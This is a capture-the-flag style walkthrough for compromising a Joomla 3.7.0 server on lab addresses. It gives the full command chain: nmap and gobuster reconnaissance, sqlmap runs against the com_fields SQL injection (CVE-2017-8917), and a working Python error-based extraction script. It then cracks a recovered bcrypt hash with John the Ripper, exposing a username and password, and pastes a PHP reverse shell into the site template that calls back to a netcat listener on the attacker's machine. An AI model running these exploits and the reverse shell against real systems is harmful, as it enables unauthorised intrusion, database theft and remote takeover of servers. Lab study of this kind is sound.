It's time to share a new scenario in which we compromise a machine by following the traces left by Joomla CMS (Content Management System). Along the way we cover several techniques and the tool set used for each of them.
Remember that Joomla is a free and open-source content management system (CMS) for publishing web content. Default settings and unapplied updates can cause critical damage: an outdated core version is enough to expose the whole database and, from there, the server. In addition, we will cover how to apply SQLi (SQL injection).
You will see what this means.
Let's start!
Target IP: 10.10.188.217
Attacking machine IP: 10.10.112.218
To avoid retyping them, save these values as shell variables (target_ip below, and later the wordlist path common_web_dir) so the commands that follow can reference them.
Let's scan the machine, discover any open doors (ports), and see what we see: nmap -sV -sC $target_ip -T4 -oN nmap_result.txt
-sV: enables version detection of services.
-sC: runs the default NSE scripts to gather additional information and perform various checks.
$target_ip: the target IP address or hostname to be scanned.
-T4: sets the aggressive timing template for faster scanning.
-oN nmap_result.txt: saves the scan results in human-readable form to nmap_result.txt.
Three ports are open: 22 (ssh), 80 (http) and 3306 (mysql). The default scripts also reveal that Joomla runs on port 80, served by Apache/2.4.6. That is useful information: an exposed MySQL port and an identifiable CMS are both worth noting.
HTTP is one click away. No need to wait, open the web root in a browser: http://10.10.188.217:80
Check out the details on the website: names, post titles and footer text often give clues about the approaches you can try.
Let's see what directory discovery turns up. You can use tools like dirb or gobuster.
Since we discovered Apache, you can use the Apache-specific wordlist /usr/share/dirb/wordlists/vulns/apache.txt, or a general one such as /usr/share/dirb/wordlists/common.txt.
DirBuster also ships with its own wordlists; any of them will do.
Save the chosen wordlist path as a shell variable as well (common_web_dir below).
Let's continue with gobuster (note that -u wants a full URL, not a bare IP):
gobuster dir -u http://$target_ip -w $common_web_dir
A paradise full of 301 (Moved Permanently) HTTP codes: every hit is a directory, and the redirect only adds the trailing slash.
Jump to the /administrator page: http://10.10.188.217/administrator
The Joomla login panel is right before us. So which version? The page source does not say. The /language directory also gave 301, so go there.
Empty? Directory listing is disabled, but that does not mean nothing is there. It is worth brute-forcing this directory, and for that we need a wordlist of language tags in the form Joomla uses (ISO language code, hyphen, ISO country code).
Create an empty .txt file.
Write the most common tags into it: en-GB, en-US, de-DE, fr-FR, es-ES and so on. Case matters: directory names are case-sensitive on a Linux web server, so en-gb will not match.
Run gobuster again with that wordlist against http://10.10.188.217/language/
Bingo! en-GB is available to us. Go.
Find en-GB.xml in that directory (/language/en-GB/en-GB.xml) and review it: the <version> element of the language manifest states the installed release.
We have the version. We managed to mark it as Joomla 3.7.0. (On other targets, /administrator/manifests/files/joomla.xml and README.txt carry the same information.)
What can we discover as an exploit? Let's search Exploit-DB with searchsploit.
We have a vulnerability that allows SQL injection: Joomla! 3.7.0 com_fields SQL Injection (CVE-2017-8917). Download and review it: searchsploit -m php/webapps/42033.txt
You've seen the method. We can try. The value of the list[fullordering] parameter in /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]= is placed into an ORDER BY clause without proper sanitisation, so SQL appended there is executed by the database, and no authentication is needed.
We need to do a general scan with sqlmap and see what more we can get (the flags take two hyphens; curly quotes and em-dashes from copy-pasting will break the command):
sqlmap -u "http://10.10.188.217/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Be sure to check the output. It may contain valuable details, such as the database names and the DBMS version.
Wow! It worked, and now our attack surface is very wide.
You can also dump everything in one go, following the process interactively (note the parameter name is list[fullordering], and -D takes the database name reported by the previous run, joomlaDataSql here):
sqlmap -u "http://10.10.188.217/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dump -D joomlaDataSql
You can explore the database by following the steps here. Alternatively, you can speed up the process with a ready-made script that automates the same error-based extraction and pulls the user table directly: https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
Let's continue with this script; it takes the site's base URL as its argument.
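To make clear what sqlmap and joomblah.py are doing under the hood, here is an added example (not code from the original writeup, from joomblah.py, or from the Exploit-DB entry) of the error-based extraction behind the com_fields injection: the list[fullordering] value is wrapped in updatexml(), MySQL reflects the concatenated result in its "XPATH syntax error" message, and because that message shows only the first 32 characters, longer values such as a 60-character bcrypt hash have to be paged with SUBSTRING(). The table and column names in SAMPLE_EXPR are assumptions (Joomla's real table prefix is per-install), and fake_fetch is a constructed stand-in for the target so the example runs offline.

```python
import re
import urllib.parse
import urllib.request

# Added example, not from the original writeup or from joomblah.py: a minimal
# error-based extractor for the Joomla 3.7.0 com_fields injection (EDB 42033,
# CVE-2017-8917). The list[fullordering] value reaches an ORDER BY unescaped.
VULN_PATH = "/index.php"
BASE_PARAMS = {"option": "com_fields", "view": "fields", "layout": "modal"}

# MySQL reflects the malformed XPath string of updatexml()/extractvalue() in
# its error message, but only its first 32 characters; '~' marks where our
# data starts so the regex does not pick up unrelated text.
ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")
CHUNK = 31  # 32-character limit minus the '~' marker


def build_url(base, query):
    """Return the attack URL that reflects the value of one SQL expression."""
    inj = f"updatexml(0x23,concat(0x7e,({query})),1)"
    params = dict(BASE_PARAMS)
    params["list[fullordering]"] = inj
    return base.rstrip("/") + VULN_PATH + "?" + urllib.parse.urlencode(params)


def extract(body):
    """Pull the reflected value out of an HTML response, or None if no error."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def recover(base, expr, fetch):
    """Read a value longer than 31 characters by paging with SUBSTRING()."""
    value, pos = "", 1
    while True:
        url = build_url(base, f"substring(({expr}),{pos},{CHUNK})")
        piece = extract(fetch(url))
        if not piece:           # None: no error raised; "": past the end
            break
        value += piece
        if len(piece) < CHUNK:  # short chunk: that was the tail of the value
            break
        pos += CHUNK
    return value


def http_fetch(url):
    """Real transport for a lab target (not exercised offline)."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed stand-in for the target: answers build_url() requests the way
# MySQL would when the expression evaluates to a 60-character bcrypt hash.
# Table/column names are assumptions; the real prefix differs per install.
SAMPLE_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"
SAMPLE_EXPR = "select password from jos_users where username='jonah'"


def fake_fetch(url):
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    inj = qs["list[fullordering]"][0]
    m = re.search(r"substring\(\((.*)\),(\d+),(\d+)\)", inj)
    pos, length = int(m.group(2)), int(m.group(3))
    piece = SAMPLE_HASH[pos - 1:pos - 1 + length]
    return f"<html><body>... XPATH syntax error: '~{piece}' ...</body></html>"


if __name__ == "__main__":
    # Against a real target you would pass http_fetch instead of fake_fetch.
    print(recover("http://10.10.188.217", SAMPLE_EXPR, fake_fetch))
```

Two things worth noticing: the loop stops on an empty chunk as well as on a missing error, because once SUBSTRING() runs past the end of the value MySQL still raises the error with only the marker in it; and the 32-character cap is the reason every public exploit for this bug, joomblah.py included, reads the password column in slices rather than in one request.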
We now have a username, an email and a hash! So what hash type is this? Check it: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
The $2y$ prefix and the cost factor 10 identify it as bcrypt, which is what Joomla 3 uses for passwords. A bcrypt type hash...
Let's save it in a file with a .hash extension, e.g. jonah_user.hash.
Run John the Ripper to crack the password hash: john --wordlist=/usr/share/wordlists/rockyou.txt jonah_user.hash --format=bcrypt
(For hashcat users, the equivalent mode is -m 3200.)
bcrypt is deliberately slow, so the run time depends on your machine's power. After a while we receive the password: spiderman123
The full account is jonah:spiderman123
Let's log in at /administrator.
So what more can we do? A reverse shell? Let's try: Joomla lets an administrator edit the PHP files of the site templates directly from the browser, which is effectively code execution.
Go to Extensions > Templates.
View Templates in the left panel and open the files of the active site template.
Did you see the index.php file in the left panel? Open it.
We will make big changes to this. First, copy this content: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Then delete the existing content and paste the reverse shell into index.php.
We need to set the IP and port the shell will connect back to. First put the attacking machine in listening mode: nc -nlvp 5110
In the pasted code, change the $ip and $port values to the attacking machine's address (10.10.112.218) and the listening port (5110).
Click the Save & Close button in the top left tab.
Refresh the website's index.php, then let the magic begin: the template is rendered on every page load, so the shell connects back to the listener.
Game over.
Now surf as you wish. The shell runs as the web server's user, so privilege escalation is the next step; remember to restore the original index.php afterwards, since the site is broken for every visitor while the shell is in place.
Don’t give up on hacking.
Code for good.
^-^